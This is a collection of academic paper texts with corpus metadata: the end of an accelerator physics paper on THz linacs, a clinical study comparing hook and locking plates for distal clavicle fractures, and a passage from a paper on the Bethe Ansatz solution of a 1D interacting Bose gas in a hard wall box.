For the quadrupole triplet, all the tolerances in terms of gradient stability and alignment have been found to be compatible with the current state-of-the-art, the tightest one being to keep the second quadrupole offset below 50 μm.
For the ICS interaction region, a synchronization at the few ps level between the electron bunch and the laser, achievable with the current technology, is sufficient. The transverse offset between the bunch and the laser at the interaction point has to be kept below the few μm level. This has been shown achievable in terms of electron bunch pointing jitter at the interaction point under the jitters assumed in this paper for all the beamline elements. The laser transverse size optimization to maximize the SPD is found to become more challenging when the bunch transverse size and energy spread increases, because the laser and electron bunch transverse sizes are then significantly different and the variations around the SPD maximum become sharper.
The requirements in terms of THz pulse properties to drive the THz linac have still not been fulfilled all at once with the current technology. However, recent progress in laser-based THz generation gives optimism that this challenge will soon be solved.
Finally, the very tight precision required for the DLW manufacturing to control the THz pulse phase velocity is an issue. However, a tuning of the THz pulse frequency (achievable by tuning the crystal temperature in laser-based THz generation) would allow compensating the manufacturing errors and retrieve a value close to the desired phase velocity. An important future study will thus be to determine the required control level on the phase velocity, by determining in which range the electron bunch properties can be preserved through a proper adjustment of only the solenoid peak field, THz linac phase and quadrupole gradients. | 2020-10-28T18:34:31.490Z | 2020-07-01T00:00:00.000 | {
"year": 2020,
"sha1": "57b05443a5ae575b4c0ef0aa96d0f84a435f80b3",
"oa_license": null,
"oa_url": "https://doi.org/10.1088/1742-6596/1596/1/012032",
"oa_status": "GOLD",
"pdf_src": "IOP",
"pdf_hash": "0f45a468517c95c53f7ab845f111fa19bad46fa3",
"s2fieldsofstudy": [
"Physics"
],
"extfieldsofstudy": [
"Materials Science"
]
} |
86662362 | pes2o/s2orc | v3-fos-license | The Radiologic Comparison of Operative Treatment Using a Hook Plate versus a Distal Clavicle Locking Plate of Distal Clavicle Fracture
Background The purpose of this study was to compare the radiologic results of patients who underwent surgery with a hook plate and a locking plate in distal clavicle fractures. Methods Sixty patients underwent surgical treatment for Neer type IIa, IIb, III, and V distal clavicle fracture. Twenty-eight patients underwent fracture fixation with a hook plate and 32 with a locking plate. Coracoclavicular distance was measured on standard anteroposterior radiographs before and after the surgery, and union was confirmed by radiograph or computed tomography taken at 6 months postoperatively. Other radiologic complications like osteolysis was also checked. Results Bony union was confirmed in 59 patients out of 60 patients, and 1 patient in the hook plate group showed delayed union. Coracoclavicular distance was decreased more in the hook plate group after surgery (p<0.01). After 6 weeks of the hook plate removal, the coracoclavicular distance was increased a little compared to before metal removal, but there was no difference compared to the contralateral shoulder. Eleven out of 28 patients (39.3%) showed osteolysis on the acromial undersurface in the hook plate group. Conclusions Both the hook plate group and the locking plate group showed satisfactory radiologic results in distal clavicle fractures. Both hook plate and locking plate could be a good treatment option if it is used in proper indication in distal clavicle fracture with acromioclavicular subluxation or dislocation.
Introduction
Distal clavicle fractures account for about 15% to 25% of all clavicle fractures. 1,2) Many surgical techniques for unstable distal clavicle fractures requiring surgical treatment, such as fixation with Kirschner wire (K-wire), 3) Weaver-Dunn operation, 4) tension band wiring, 3,5) coracoclavicular screw fixation, [6][7][8] fixation with plate, [9][10][11][12] and arthroscopic coracoclavicular ligament repair using endobutton, 13) have been introduced. Among metal plate fixation techniques, the use of a hook plate facilitates reduction of superior migration of proximal bone fragments and maintenance of reduction, and makes it possible to maintain reduction indirectly without direct fixation of distal fragments with screws when distal fragments are very small. 14) However, subacromial osteolysis is more likely to occur in the subacromial space where the hook plate is placed, 15,16) and it is impossible to recover the full range of motion (ROM) due to the hook plate. Therefore, it is known that it is better to remove the hook plate within 6 months after surgery. However, 6 months may not be sufficient for fracture healing. 17) In addition, side effects such as rotator cuff tears, subacromial impingement syndrome, 18) and periprosthetic fractures 19) have been reported. On the other hand, fixation with a locking plate involves the difficulty of direct placement of screws on distal fragments, and has the disadvantage that it cannot be performed if distal fragments are small. 20) In addition, distal clavicle fractures accompanied by a rupture of the coraco-clavicular ligament have the problem that the coracoclavicular distance is not easily restored without performing direct repair or reconstruction of the coracoclavicular ligament, 21) but the abovementioned disadvantages of hook plates can be complemented or overcome. In this study, we aim to compare the radiological results of patients with distal clavicle fractures who were surgically treated with a hook plate or a locking plate.
Methods
The subjects were 60 patients who underwent internal fixation with a 3.5 mm LCP Clavicle Hook Plate (Synthes, West Chester, PA, USA) or Locking Clavicle Plate (Hankil Techmedical Co., Hwaseong, Korea) from 2009 to 2017 among patients with Neer type IIa, IIb, III, and V distal clavicle fractures. The patients who had Neer type I or IV distal clavicle fractures, received conservative treatment, underwent fixation with only K-wires or screws, or underwent coracoclavicular ligament reconstruction were excluded from this study. Among the subjects, 28 patients underwent surgery with a hook plate, and 32 patients with a locking plate. Metal removal was performed when we were able to detect signs of fracture healing on plain radiographs or computed tomography images (CTs) taken at 6 months after surgery. Since complications such as osteolysis or fracture may occur in patients who underwent surgery with a hook metal plate, we planned to perform implant removal if fracture union was detected 6 months after surgery, and locking plate removal was performed within one year after surgery at the latest. At 6 weeks after implant removal, clavicular anteroposterior plain radiographs were taken, the coracoclavicular distance of both the left and right sides was measured. In addition, when a hook plate was used, it was also examined whether osteolysis around the hook or other complications like a fracture occurred.
Surgical Methods and Postoperative Management
Under general anesthesia, the patient was placed in the beach chair position and a skin incision was made over the distal clavicle fracture site using the standard approach. After exposing the fracture site and performing reduction, fixation was performed with a locking plate when it was possible to place at least three screws in the distal fragment, but when they were small or the fracture was severely comminuted, distal fragments were fixed with a hook plate (Fig. 1, 2). After confirming that satisfactory reduction was achieved using C-arm fluoroscopy, fixation was performed using a metal plate and screws. Additional reduction and fixation for displaced bone fragments were performed with a K-wire or wire loop if necessary (Fig. 3). K-wires were additionally used in 1 case of the hook plate group and in 4 cases of the locking plate group, and wire loops were additionally used in 1 case of the hook plate group. No patient in either of the two groups underwent coracoclavicular ligament repair. All the patients wore a shoulder immobilizer for 6 weeks postoperatively, and active ROM exercises of the elbow joint, wrist joint, and fingers were performed immediately after surgery. At 6 weeks postoperatively, the shoulder immobilizer was removed and active ROM exercises of the shoulder joint were performed.
Statistical Analysis
Statistical analysis was performed using IBM SPSS ver. 22 (IBM Co., Armonk, NY, USA). The independent t-test and chi-square test were performed, the significance level was defined as 0.05, and if the p-value was less than 0.05, it was considered to indicate a statistically significant difference.
Results
There was no statistical difference in demographic data between the two groups (Table 1). A total of 60 cases of distal clavicle fractures included 23 cases of Neer type IIa, 18 cases of Neer type IIb, 1 case of Neer type III, and 18 cases of Neer type V. There was no difference in fracture types classified according to the Neer classification between the two groups (p=0.26) ( Table 2). There were no specific complications after surgical treatment in all of 60 patients. The mean operative time was 65.7 ± 14.8 minutes in the hook plate group and 70.5 ± 17.2 minutes in the plate group. There was no significant difference in operative time between the two groups (p=0.25). Complete fracture Values are presented as number (%) or mean ± standard deviation. healing was obtained in 59 out of 60 patients. One patient who underwent surgery with a hook plate showed delayed union at 6 months postoperatively. In the patient showing delayed union, X-rays taken immediately after surgery showed that the hook plate was properly placed under the acromion (Fig. 4B), but the hook gradually migrated into the acromion during the follow-up period, so we decided to remove the metal plate 6 months after surgery. Although X-ray taken at 6 months postoperatively did not show fracture union, partial bone union was detected on CT (Fig. 4D), so it was considered unnecessary to perform refixation. Therefore, while removing the metal plate, only autogenous iliac bone graft was performed for the site showing delayed union. X-ray taken at 3 months after the surgery provided radiographic findings of complete fracture union (Fig. 4E). In 11 of 28 patients (39.3%) who were surgically treated with a hook plate, osteolysis of the acromion where the hook plate was located were detected, but there were no complications such as fractures (Fig. 5). The mean coracoclavicular distance was measured to be 19.4 ± 4.3 mm in the hook plate group and 17.7 ± 6.7 mm in the locking plate group before surgery. After surgery, the mean cora-coclavicular distance was 6.8 ± 3.3 mm in the hook plate group, and 10.8 ± 2.5 mm in the locking plate group, respectively, so significant decreases were observed compared to the preoperative measures (p<0.01). As for the value obtained by subtracting the coracoclavicular distance of the uninjured side from that of the injured side (henceforth, CCDD), the preoperative mean value was 10.3 ± 4.3 mm in the hook plate group and 9.4 ± 6.2 mm in the locking plate group, so there was no statistically significant difference between the two groups (p=0.51). After surgery, the mean CCDD values were -1.9 ± 3.4 mm in the hook plate group and 3.0 ± 2.5 mm in the locking plate group, showing that an overcorrection was made in the hook plate group compared to the degree of reduction in the locking plate group (p<0.01), and that there was a significant decrease in both the groups compared to the preoperative values (Table 3).
Twenty-six out of 32 patients in the hook plate group underwent implant removal at 7.7 months (4.6 to 14.1 months) after surgery on average. In the locking plate group, 23 out of 28 patients underwent implant removal at 13.5 months (8.8 to 35.9 months) after surgery on average. In the locking plate group, there was almost no change in the coracoclavicular distance before and after implant removal, but in the hook plate group, X-ray taken at 6 weeks after implant removal showed that the coracoclavicular distance was slightly increased to 8.22 ± 2.62 mm compared to the values before implant removal, but CCDD was measured to be -0.30 ± 2.48 mm, showing almost no difference in the coracoclavicular distance between the injured side and the contralateral side (Table 4). Values are presented as mean ± standard deviation. CCD: coracoclavicular distance of injured side as measured in anteroposterior (AP) radiographs, CCDD: subtraction of coracoclavicular distance of uninjured side from that of injured side as measured in bilateral AP radiographs. Values are presented as mean ± standard deviation. CCD: coracoclavicular distance of injured side as measured in anteroposterior (AP) radiographs, CCDD: subtraction of coracoclavicular distance of uninjured side from that of injured side as measured in bilateral AP radiographs.
Discussion
In this study, we could obtain fracture union without major complications in both the group surgically treated with a hook plate and the group surgically treated with a locking plate for distal clavicle fractures. There was no difference in operative time between the two groups, and there was a significant decrease in the coracoclavicular distance, which had been increased preoperatively in both the groups.
Unlike hook plates, locking plates cannot fix the acromioclavicular joint, but in most cases of distal clavicle fractures, there is no rupture of the acromioclavicular ligament and the coracoclavicular ligament is attached to the distal bone fragment, so the coracoclavicular distance is expected to be improved only by fracture reduction. 22) In this study, we were also able to confirm the reduction of the coracoclavicular distance in all patients who underwent surgery with a locking plate. However, the coracoclavicular distance was different by about 3.0 mm from that of the uninjured side. This finding suggests that coracoclavicular distance cannot be maintained if only fracture reduction is performed without stabilizing the coracoclavicular ligament. In the hook plate group, it was found that a slight overcorrection of thecoracoclavicular distance was made compared to the uninjured side. This can be attributed to the fact that an overcorrection was attempted intentionally to avoid the loss of reduction after implant removal. In the case of acromioclavicular joint dislocations where both the acromioclavicular ligament and coracoclavicular ligament are ruptured, a partial loss of reduction is commonly observed after implant removal when fixation is performed using a hook plate. 23) However, in this study, it was found that reduction of the coracoclavicular ligament was maintained even when the hook plate was removed. This is presumed to be due to the fact that the acromioclavicular ligament is intact and the coracoclavicular ligament is partially attached to the bone fragments in most cases of distal clavicle fractures.
It is known that there is no significant difference in the clinical results of distal clavicle fractures between the cases where the difference in the coracoclavicular distance between the injured and uninjured sides is 10% or higher and the cases where the difference is less than 10%, 21) so implications of the difference in the coracoclavicular distance are not clear yet. However, it is thought that there is a need for continuous follow-up since there has not been research on complications requiring long-term follow up such as acromioclavicular arthritis.
When a hook plate is used, it is impossible to maintain fixation for a long time due to problems such as acromion fractures, 24,25) acromion osteolysis caused by the hook plate, 26) and a reduction of the ROM of the joint, 27) so there are concerns about whether it is possible to maintain fixation for sufficient time until fracture union is achieved. In this study, complete fracture healing was achieved at about 6 months after surgery in all the subjects except one out of 28 patients who underwent surgical treatment with a hook plate. In one patient, delayed union was detected, so implant removal was performed. Then, the patient also showed complete bone union by autogenous bone graft alone without additional fixation. As shown in Fig. 4, CT taken at 6 months after surgery showed the migration of the hook of the hook plate into the acromion, so we determined that removal of the metal plate was necessary because of the possibility of fracture despite of partial union. In this case, it was expected to be difficult to obtain fracture union easily because of severe fragmentation and displacement of the fracture before surgery. Therefore, it is difficult to attribute partial union at 6 months after surgery to the use of the hook plate. In distal clavicle fractures, fixation for 6 months is thought to be enough time to obtain fracture union, and when surgery is performed with a hook plate, there is no need to make much subperiosteal dissection since the use of a hook plate obviates the need to make an effort to obtain anatomical reduction unlike when a locking plate is used. Therefore, the use of hook plates makes it possible to perform fixation minimizing damage of the blood flow to the cortical bone. In this respect, the use of hook plates may be helpful for fracture union.
Erdle et al. 23) reported that the degree of correction of the coracoclavicular distance was greater when a hook plate was used than when a locking plate was used, but that the coracoclavicular distance was larger compared to that of the uninjured side. On the other hand, in this study, the coracoclavicular distance was measured to be smaller than that of the uninjured side in the hook plate group. This is a result reflecting the intentional attempt to make a slight overcorrection compared to the uninjured side taking into account the fact that the coracoclavicular distance may be increased after implant removal. As a result, the coracoclavicular distance was measured to be smaller than that of the uninjured side while the hook plate was placed in the fracture site. However, after the hook plate was removed, the coracoclavicular distance recovered to almost the same level as the uninjured side.
In this study, we detected indications of osteolysis at the location of the hook plate in about 40% (11 out of 28 cases) of the patients treated with a hook plate, and it was found that the hook plate migrated into the acromion in 2 cases. The incidence of osteolysis was not higher compared to other studies, 18,26,28) and no major complications such as a fracture due to osteolysis or a fracture at the internal side of the hook plate occurred. 24,25) This is thought to be a result from the fact that the metal plates were removed at a relatively early stage rather than placing them in the body for a long time.
This study has several limitations which need to be pointed out. First, this study is a retrospective study. It is considered difficult to conduct a prospective study because the choice of metal plate fixation techniques depends on the types of fracture even though the fracture site is identical. Second, types of metal fixation devices were not randomly assigned. As mentioned above regarding the first limitation, in this study, different methods of metal plate fixation were used depending on the type of fracture. When the length of the distal fragment was enough to insert three or more screws, a locking screw was inserted to perform anatomical reduction. On the other hand, when the length of the distal fragment was not sufficient, fixation was performed with a hook plate without making much subperiosteal dissection. It is believed to be an inevitable choice due to the features of each metal fixation device, and it is thought that this factor did not have a significant impact on the results of this study because the choice of metal fixation devices was not made based on the coracoclavicular distance. Third, we made no comparison of clinical outcomes. However, both of the methods are known to show relatively good clinical outcomes, 14) and this study focused on the comparison of radiological results between the two surgical techniques because we achieved fracture union finally in all the subjects without any particular complications.
Conclusion
As a result of evaluation of the radiological results of surgical treatment of distal clavicle fractures accompanied by displacement, satisfactory fracture reduction and bone union were confirmed in both the hook plate group and the locking plate group. The coracoclavicular distance was more decreased in the hook plate group than in the locking plate group, and fracture reduction was also more stably maintained in the hook plate group after the metal plate was removed. In many cases, radiographs showed phenomena such as osteolysis, but there were no radiological findings of problems such as fractures when implant removal was performed approximately 6 months after surgery. | 2019-03-28T13:33:58.345Z | 2018-12-01T00:00:00.000 | {
"year": 2018,
"sha1": "f7865e1af4f2dfdc068cecef3d3fc7926c3d00c2",
"oa_license": "CCBYNC",
"oa_url": "https://www.cisejournal.org/upload/pdf/CISE021-04-09.pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "d136c7bb265622e05085ace097147889656c3150",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
17067769 | pes2o/s2orc | v3-fos-license | The 1D interacting Bose gas in a hard wall box
We consider the integrable one-dimensional delta-function interacting Bose gas in a hard wall box which is exactly solved via the coordinate Bethe Ansatz. The ground state energy, including the surface energy, is derived from the Lieb-Liniger type integral equations. The leading and correction terms are obtained in the weak coupling and strong coupling regimes from both the discrete Bethe equations and the integral equations. This allows the investigation of both finite-size and boundary effects in the integrable model. We also study the Luttinger liquid behaviour by calculating Luttinger parameters and correlations. The hard wall boundary conditions are seen to have a strong effect on the ground state energy and phase correlations in the weak coupling regime. Enhancement of the local two-body correlations is shown by application of the Hellmann-Feynman theorem.
Introduction
Quantum Bose and Fermi gases of ultracold atoms continue to attract considerable interest since the experimental realization of atomic Bose-Einstein condensates (BEC) [1,2,3,4] and the pair condensation of fermionic atoms [5,6,7]. Particular attention has been paid to one-dimensional (1D) Bose gases, which are seen to exhibit the rich and novel effects of quantum many-body systems [8,9,10,11,12,13,14,15]. As a consequence, there has been a revival of interest in the exactly solved 1D model of interacting bosons. It is well known that the δ-function interacting Bose gas is integrable [16,17] and can be realized via short-range interactions with an effective coupling constant g 1D [9]. This constant is determined through an effective 1D scattering length a 1D ≈ a 2 ⊥ /a, where a ⊥ is the characteristic length along the transverse direction and a is the 3D scattering length. The ratio of the average interaction energy to the kinetic energy, γ = mg 1D 2 n , is used to characterize the different physical regimes of the 1D quantum gas. Here m is the atomic mass and n is the boson number density. In the weak coupling regime, i.e., γ ≪ 1, the wave functions of the bosons are coherent. In this regime, the density fluctuations are suppressed and the phase correlations decay algebraically at low temperatures. Thus the 1D Bose gas can undergo a quasi BEC. However, in the opposite limit, i.e., the Tonks-Girardeau limit γ ≫ 1, the bosons behave like impenetrable hard core particles, the so called Tonks-Girardeau gas [18]. In this regime the single-particle wave functions become decoherent and the system acquires fermionic properties.
The 1D Bose gas is realized experimentally by tightly confining the atomic cloud in two (radial) dimensions and weakly confining it along the axial direction. The motion along the radial direction is then frozen to zero point oscillations [19,20,21,22,23], making the gas effectively one-dimensional. Anisotropic trapping along the radial and axial directions can form either a 2D optical lattice or 1D tubes. There have been two types of 1D quantum gases, the lattice Bose gas [19,20,21] and the continuum Bose gas confined in a harmonic potential along the axial direction [22] (see figure 1). From a theoretical point of view, the former is usually described by the Bose-Hubbard model while the latter is described by the 1D interacting Bose gas. The Bose-Hubbard model is not integrable, except for a special case [24], which corresponds to two sites. On the other hand, the trapping potential along the axial direction breaks the integrability of the 1D Bose gas. However, the long-wavelength properties of the 1D Bose gas and the Bose-Hubbard model can be described by a Luttinger liquid, owing to the universality of the low energy excitations, i.e., gapless excitations with a linear low-energy excitation spectrum and power-law decay in the correlations [25].
The exactly solved 1D interacting Bose gas has been extensively studied [26,27,28,29,17,30,31,32,33,34]. The ground state energy and low energy excitations [16,35], thermodynamic behaviour [36], finite-size effects [37], correlation functions [27,38] and Luttinger liquid behaviour [39,40,41] have been investigated via various methods. The signature of the 1D Bose gas is strongly influenced by the interaction strength and the external trapping potential. The effects of spatial inhomogeneity and finite temperature are other considerations to be taken into account under experimental conditions. To this end, several approximation schemes have been adopted to describe the main features of the 1D trapped Bose gas. In particular, the local density approximation [11,42,43,44] is widely used for calculating the density profiles of bosons and fermions in harmonic traps. Now for a finite number of bosons and finite system size, boundary effects are expected to be pronounced at low temperature [45,46,47]. Indeed, significantly different quantum effects should be exhibited by a finite number of bosons confined in a finite hard wall box. For example, in the weak coupling regime, macroscopic states lie on the zero point oscillations as if the system undergoes BEC. The density expectation value exhibits Friedel oscillations and the correlation decay is slower than in the periodic case, due to the enhancement of the density and phase stiffness. The boundary conditions also have an effect on the phase correlations near the boundaries. The ground state of the 1D interacting Bose gas with hard wall boundary conditions has no momentum pairing (with a −k for each k) compared to the period case, because of the missing translational symmetry. The hard wall boundary conditions have been experimentally realized by square potentials with very high barriers [48]. Most recently, BEC have been produced in a novel optical box trap [49], in which atom numbers are as small as 5 × 10 2 . More experiments in this direction can be anticipated [50,51]. These are our motivations for studying the ground state properties of the 1D interacting Bose gas confined in a hard wall box.
The 1D interacting Bose gas with hard wall boundaries was solved by Gaudin in the early 1970's [52]. Gaudin calculated the surface energy via the Bethe Ansatz solution in the thermodynamic limit. Very recently, this model was studied via Haldane's harmonic liquid theory [47,40], which describes the long wave-length properties of the 1D fluid in terms of the density and phase fluctuations. The correlation functions of the Tonks-Girardeau gas have also been studied with hard wall boundary conditions [53].
The paper is organized as follows. In Section 2, we present the Bethe Ansatz wave functions and Bethe equations for the 1D interacting Bose gas with hard wall boundary conditions. Details of the Bethe Ansatz solution are given in Appendix A. In Section 3, we derive the ground state energy via asymptotic roots of the Bethe equations in the strong and weak coupling limits. We derive the surface energy through the continuum integral equations in Section 4. In Section 5, we calculate the ground state energy in the strong and weak coupling limits using Wadati's power series expansion method [31,54,55]. A discussion of the connection between the 1D Bose gas trapped by an harmonic potential and the exactly solved model is given in Section 6. The low-energy properties are discussed in Section 7, with concluding remarks given in section 8.
The Bethe Ansatz solution
The 1D quantum gas of N bosons with δ-function interaction in a hard wall box of length L is described by the Hamiltonian where the hard walls are defined via the boundary conditions [52] Ψ(x 1 = 0, x 2 , . . . , x N ) = 0, Ψ(x 1 , x 2 , . . . , x N = L) = 0.
Here g 1D = 2 c/m is an effective 1D coupling constant with scattering strength c. The wavefunction Ψ must be totally symmetric in all its arguments, as required for a bosonic system. For harmonic trapping along the axial direction, the scattering strength is given by c = 2 |a 1D | . The trapping potential should be added to the Hamiltonian (1) as an external field. However, harmonic potentials appear to break the integrability of the model. Fortunately the integrability of the model is preserved by the hard wall boundary conditions [52]. This provides us with an opportunity to study the signature of the 1D Bose gas in a hard wall box in an exact fashion. For simplicity, we set = 2m = 1 in the following.
The explicit solution of the model via the coordinate Bethe Ansatz is described in Appendix A. The wavefunction is given by where the sum extends over all N! permutations P and all signs ǫ i = ± (see Appendix A). The wavefunction is valid in the domain 0 ≤ x 1 < . . . < x N ≤ L and can be continued via symmetry in all coordinates x i . The wavefunction coefficients A(ǫ 1 k P x 1 · · · ǫ N k P x N ) are determined by the Bethe roots, or wave numbers, k i via In the above equation (−) P denotes a (±) sign factor associated with even/odd permutations. The wave numbers satisfy the Bethe equations The energy eigenvalues are as usual given by Like the periodic boundary condition case [27], the Bethe roots k i are known to be real for repulsive interactions (c > 0), but they may become complex for attractive interactions (c < 0). Here we consider the repulsive regime. Free bosons are recovered for c = 0, i.e., k = πn/L, n ∈ N (see Appendix A).
Asymptotic solutions to the Bethe equations
In contrast with periodic boundary conditions, the ground state no longer contains ± momentum pairs due to the reflection of quasi momenta at the boundaries. As a result the total quasi momentum N j=1 k j is not conserved in this case. We first examine the asymptotic solutions of the Bethe equations (5) in the strong and weak coupling limits.
Tonks-Girardeau regime
It is well known that in the strong coupling regime, i.e., γ ≫ 1, the 1D Bose gas with repulsive interaction behaves like a gas of weakly interacting fermions [51]. In the limiting case c = ∞ the exact solution for periodic boundary conditions and harmonic trapping has been given for impenetrable bosons [18,14]. In the hard wall setting the fermionic behaviour can be seen from the ground state energy. Define the variables z j = Lk j /N and γ = Lc/N. Then for γ ≫ 1/N the Bethe equations (5) can be written in the asymptotic form in which the summations exclude ℓ = j and ℓ ′ = j. Here we restrict the solutions to z j > 0. The asymptotic Bethe roots for the ground state energy follow from the condition that the eqns (7) be consistent. It follows that in this limit the ground state energy per particle is given by We emphasize that these asymptotic solutions are very accurate for the Tonks-Girardeau regime. We will compare the ground state energy (9) with numerical solutions of the continuum integral equation, which is the hard-wall analogue of the Lieb-Liniger integral equation, in Section 4. The explicit form for the wave numbers k j also allows an in principle calculation of the asymptotic correlation functions directly from the wave function (3). Switching back to real physical units, the ground state energy per particle (9) can also be written as Here the bulk energy e 0 (γ) and the surface energy e f (γ) are given by A useful quantity is the 1D temperature T 1D = 2E N k B , which is just the ground state energy in different units [22]. We plot T 1D obtained from (10) as a function of the interaction strength γ in figure 2 for a gas of N = 37 bosons confined in boxes of length L = 35.25 µm and L = 32.61 µm. These are the same parameters as in Figure 3 of Ref [22]. The dashed horizontal lines are the corresponding values of T 1D in the Tonks-Girardeau limit. We remark that for hard wall boundary conditions, the particle density distribution is rather flat and homogeneous. It can be seen that T 1D increases rapidly as γ increases in the weak coupling regime. It then slowly approaches the Tonks-Girardeau energy as γ tends to infinity. In an actual experiment, the length of the atomic cloud varies with the interaction strength. In that case the T 1D will increase smoothly as γ increases. Most significantly, T 1D is sensitive to the length of the hard wall box. The smaller the length of the box, the larger the 'quasi-momentum' of the particles. We note also that the surface energy is positive. In the thermodynamic limit, the ground state energy for periodic boundary conditions is proportional to the linear density n. Therefore, in the thermodynamic limit, the ground state energy per particle of the Bose gas in a hard wall box can be considered as an excited state of a Bose gas with 2N particles in a periodic box of length 2L [52]. We will study the ground state properties for the hard wall box further in Section 4.
Weak coupling regime
The ground state properties in the weak coupling limit are both subtle and interesting. So far it has proved difficult to reach the weak coupling regime via anisotropic trapping in experiments [22] and it is necessary to sharply define the criterion for weak coupling [41,43]. In the experiment, the 1D regime is reached if the radial zero point oscillation length l 0 = /(mω ⊥ ) is much smaller than the axial correlation length where ω ⊥ is the frequency of the radial trap and µ is the chemical potential of the 1D system, thus the condition is µ ≪ ω ⊥ for the 1D trapped system. In general, γ ≪ 1 at zero temperature is referred to as the weak coupling regime. The Thomas-Fermi regime is usually reached for µ ≫ ω, where ω is the axial oscillation frequency for the harmonic trap. In this regime the kinetic energy term can be neglected and the system has a parabolic density distribution profile [11], referred to as the Thomas-Fermi BEC. However, in the regime µ ≪ ω the system is considered to have a macroscopic occupation in the ground state of the trap with a Gaussian density profile [41]. For the hard wall boundary conditions, the leading terms in the ground state energy can be obtained through asymptotic solutions of the Bethe equations (5) in analogy with the periodic case [34]. Here the wave numbers k j for the ground state satisfy the algebraic equations Algebraic equations for periodic boundary conditions have arisen in a number of different contexts [34], most notably in the integrable BCS pairing models [56]. The roots of such equations also describe the equilibrium positions of potentials in Calogero systems associated with Lie algebras [57]. The solutions of (13) give the ground state energy This is quite different from the periodic boundary case, for which the leading term in the ground state energy per particle is E N ≈ (N − 1)c/L. Here, due to the reflections at the boundaries, the ground state energy for hard wall boundary conditions is larger than the energy for periodic boundary conditions. For the integrable 1D Bose gas with periodic boundary conditions, the ground state energy per particle is known to be given by 16,28,31]. We argue that this result holds in the regime 1/N 2 ≪ γ ≪ 1. The leading term of the ground state energy per particle for periodic boundary conditions, i.e. E N ≈ 2 n 2 2m γ holds in the mean-field regime, i.e., γ ≪ 1/N 2 , for which the correction term is proportional to γ 2 rather than γ 3/2 . This discrepancy is not totally unexpected, as the Lieb-Liniger integral equation is only valid up to terms of order 1/L. If the interaction energy is much smaller than the scale of 1/L, i.e., if γ ≪ 1/N 2 , results derived from the Lieb-Liniger integral equation are no longer valid in this very weak coupling regime. On the other hand, in the regime γ ≫ 1/N 2 the zero point oscillation kinetic energy is much smaller than the interaction energy and is thus negligible -it is here that one can derive the ground state energy asymptotically from the continuum integral equation. Finite-size discrepancies between the discrete and integral equation approaches have also been noted in Ref. [58].
The surface energy
Taking the logarithm on both sides of the Bethe equations (5) gives where j = 1, . . . , N and m j are ordered positive integers, i.e., 1 ≤ m 1 ≤ . . . ≤ m N .
Here for later convenience we have denoted the Bethe roots byk. Our calculation takes advantage of the fact that in the thermodynamic limit, the ground state energy of the N boson system in a box of length L is equivalent to one half the energy of 2N bosons with length 2L and periodic boundary conditions, as pointed out by [52]. It is thus convenient to derive the surface energy from a periodic system of 2N bosons with a length 2L, for which the Bethe equations are [16] ‡ 16) ‡ Of course, one may also obtain the same free energy by treating the Bethe equations (15) directly, see, e.g., Ref. [59].
for k j > 0 and I j are half-odd integers. We now introduce the notation k −j = −k j and I −j = −I j . The difference betweenk j and k j can thus be written as where j = −N, . . . , N and ǫ j is a sign factor. The surface energy is given by Usingk j − k j < π/L and taking the Taylor expansion of equations (17) atk j = k j + ∆k j gives It follows that Let us define k j+1 − k j = 1 2Lf (k j ) , where f (k) is the distribution function [16], then the Bethe equations (16) become Here we use the density n = 2N 2L and define the cut-off momentum B. Subsequently, equation (19) becomes Here ǫ(k) = sgn(k). Further defining f f (k) = L∆kf (k), the surface energy is given by where f f (k) satisfies the integral equation After the same rescaling as introduced in Ref. [16], i.e., k = Bx, c = Bλ, f (Bx) = g(x), we find the ground state energy per particle to be of the form (10). The bulk and surface energies are given by where with the cut-off condition There are various methods which can be used to solve the above equations (27) and (28). In the next section we derive analytic results from these equations in the strong and weak coupling limits.
Application of Wadati's power series expansion method
As remarked in references [52,55], the Lieb-Liniger integral equation is closely related to the Love equation for the problem of a circular plate condensator [60]. One can obtain a series expansion for the ground state energy from the integral equation [31]. This method has also been applied to the Yang-Yang integral equations for the thermodynamics [54] and to the Gaudin integral equation for the attractive δ-function interacting Fermi gas [55]. For the Bose gas with hard walls, Gaudin [52] found the leading surface energy term in the weakly interacting limit. In this section, we apply the Wadati method to obtain the leading terms in the ground state energy from the integral equations (27) and (28).
Tonks-Girardeau regime
In the strong coupling regime the bulk part of the ground state energy per particle is given by [16,31,34] which agrees with the asymptotic result (11). Calculating the first two terms in the expansion for the distribution function (28), we find This leads to the surface energy We see that the constant term in the surface energy (34) is the same as in (12), but the leading correction term differs. Again this is because the continuum integral equation derived from the Bethe equations is only valid for terms of order up to 1/L.
Weak coupling regime
In this regime the leading terms of the distribution function are found to be The surface energy e f ≈ 8 3 √ γ follows from equation (28). Here we keep only the leading term, as for a large number of particles, the contribution from other terms is negligible. The ground state energy per particle in the regime 1/N 2 ≪ γ ≪ 1 is again of the form (10) where the leading bulk and surface energy terms are So far we have derived some analytic results for the ground state energy of the interacting 1D Bose gas with hard wall boundary conditions. One may also perform direct numerical calculations using the integral equations (27) and (28), as originally done in the bulk [16]. In doing this we see that the ground state energy (10), with (11) and (12), is consistent with the result obtained from the the integral equations (27) and (28) for γ > 1, with best agreement found for γ > 5 (see figure 3). A comparison between the analytic result and numerical calculation for weak coupling is presented in Figure 4. A discrepancy between the numerical and analytic results is evident for weak coupling. This implies that the next leading term in the surface energy (37) is necessary. As expected, there is a difference between the finite-size results and the limiting curve obtained in the thermodynamic limit.
Comparison with the 1D Bose gas trapped by harmonic potentials
The experimental realization of the Tonks-Girardeau gas trapped in harmonic potentials has involved the measurement of momentum distribution profiles [20,21], the ground state energy [22] and collective oscillations [23]. To model the experiments more closely it is desirable to take into account the 'soft' boundaries of the harmonic potential rather than the commonly used 'hard' boundaries of a box. Unfortunately the axial trapping potential breaks the homogeneity of the integrable model. However, if the density varies smoothly in a small interval the systems under consideration can be thought of as a uniform Bose gas in each small interval [11,41,43]. This quasiclassical approach is called the local density approximation and is used to study the density distribution profile in cases where the chemical potential is much larger than the level spacing ω in the 1D direction. For the equilibrium state the chemical potential of the system in a harmonic trap can be taken to be constant. (27) and (28) and the analytic expression for strong coupling (10), with (11) and (12), derived from the discrete Bethe equations (5). A generally good agreement between the numerical and analytic results is visible. The lowest curve is obtained in the thermodynamic limit.
